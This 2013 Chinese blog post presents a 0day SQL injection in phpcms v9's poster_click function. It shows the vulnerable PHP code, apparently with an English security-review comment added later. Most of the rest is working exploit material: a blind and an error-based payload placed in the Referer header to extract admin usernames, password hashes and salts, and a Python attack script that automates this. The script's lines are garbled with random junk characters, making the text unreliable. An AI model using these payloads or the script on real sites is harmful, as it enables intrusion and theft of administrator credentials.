
phpcms post_click注入0day利用代码

发表于 2013-1-11 21:01:00
有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数:\phpcms\modules\poster\index.php
/**
 * Record a click on the record selected by GET `id` and redirect the browser.
 *
 * Flow visible here: load the record, insert a click-log row into `s_db`,
 * increment `clicks` on the record, then send a `Location:` header.
 *
 * Security review of this listing (the reason it is on this page):
 *  - The click-log insert stores `HTTP_REFERER` verbatim. That constant is
 *    defined elsewhere (not shown); the write-up above demonstrates that a
 *    quote-closing string placed in the request's Referer header reaches the
 *    SQL statement, i.e. neither the constant nor `s_db->insert()` escapes
 *    it on the affected version. Any request header is attacker-controlled
 *    and must be escaped/parameterised (or length-bounded and not stored at
 *    all) before it is written to the database. `username` comes from a
 *    cookie and should be treated the same way unless `param::get_cookie()`
 *    is known to sanitise it — TODO confirm against that helper.
 *  - The `else` branch below redirects to a caller-supplied `url` parameter
 *    with no validation, which is an open redirect; redirecting only to the
 *    configured `linkurl`, or validating `url` against an allow-list, removes
 *    it.
 *  - Detection/mitigation notes for operators: SQL syntax in Referer headers
 *    of requests to `a=poster_click`, and MySQL "Duplicate entry" text in the
 *    response body, are the signals of this exploit; disabling displayed
 *    database errors removes the error-based leakage channel.
 *
 * @return false|void  `false` when no record matches `id`; otherwise emits
 *                     the redirect header and returns nothing.
 */
public function poster_click() {
    // `id` is cast with intval(), so this value itself is not injectable.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // Cookie-sourced value; sanitisation (if any) happens inside get_cookie — verify.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // INJECTION POINT: 'referer' => HTTP_REFERER is request-controlled and
        // reaches the INSERT unescaped on the affected version (see header comment).
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    // '+=1' is wrapper-specific increment syntax; its handling is not shown here.
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // OPEN REDIRECT: `url` is taken from the query string without validation.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}

利用方式:

1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
通过返回页面正常与否,一个个猜解密码字段。
  c' O' M3 A  c: F0 f& \& }% `5 V$ b
2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 d, J/ f% v% F4 H& Q' A: r; b3 \

此方法是报错注入手法,原理自查。

利用程序:
; a! `; K' m& `( F( s% C#!/usr/bin/env python9 Q0 _( P8 R/ o" b; E
import httplib,sys,re+ n: }/ E; W! w
0 T: [+ F/ `$ p5 I6 i0 x# ^
def attack():$ j# l+ |1 v9 v& ~) N& o
print “Code by Pax.Mac Team conqu3r!”9 `& E7 g( V6 E# i# A$ L4 b
print “Welcome to our zone!!!”. B# I6 G! c. @3 D/ v
url=sys.argv[1]
1 P  ~! J* b5 T$ e9 {$ Wpaths=sys.argv[2]
) T5 `6 H0 h% Z8 K9 L/ yconn = httplib.HTTPConnection(url)
& w# R" j" ^6 C0 W5 ji_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
! `* x. d, }# c4 N" M' a“Accept”: “text/plain”,
/ v, D$ N5 i* [; H/ k1 K“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
6 u9 a  Q: I' }2 mconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
( B/ B0 g3 r2 Z: Er1 = conn.getresponse()( ?$ L" m+ l" T6 p( ]: u( z' J4 I
datas=r1.read()$ [7 {  d: @& q0 J
datas=re.findall(r”Duplicate entry \’\w+’”, datas)$ g; Y9 O: F' k/ p  o  S8 c8 o% N* r
print datas[0]3 H" W8 m# Z0 p, @
conn.close()
6 q4 `4 t* u! Uif __name__==”__main__”:$ J; l6 w) X! g+ j
if len(sys.argv)<3:
5 e: @" f7 ~4 P6 o' G+ G8 qprint “Code by Pax.Mac Team conqu3r”5 ^* y+ X! G+ T3 r8 {& j
print “Usgae:”
4 e  E' ^: }$ A* pprint “    phpcmsattack.py   www.paxmac.org /”
. r+ T% i7 l3 g% h6 ^& b) |( @# @print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”" `/ I; Z" g# e) {
sys.exit(1)5 d3 N5 n$ G1 h' d  j
attack()
9 q6 i& }1 S8 S! J% V! @0 U
* f5 d+ A$ x. A' C- b7 t. E